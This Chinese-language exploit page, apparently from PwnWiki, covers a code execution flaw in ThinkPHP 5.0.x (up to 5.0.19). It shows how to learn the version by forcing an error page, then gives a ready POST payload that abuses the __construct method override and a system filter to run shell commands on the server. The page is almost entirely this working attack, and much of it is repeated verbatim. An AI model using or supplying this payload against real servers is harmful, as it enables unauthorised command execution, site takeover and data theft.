ThinkPHP 5.0.13 代码执行漏洞
From PwnWiki
影响版本
ThinkPHP <= v5.0.19
漏洞利用
通过报错确定ThinkPHP版本
http://127.0.0.1/tk5/public/index.php/111
Payload
http://127.0.0.1/tk5/public/index.php
post发送数据
s=whoami&_method=__construct&method=&filter[]=system
ThinkPHP <= v5.0.19
通过报错确定ThinkPHP版本
http://127.0.0.1/tk5/public/index.php/111
http://127.0.0.1/tk5/public/index.php
post发送数据
s=whoami&_method=__construct&method=&filter[]=system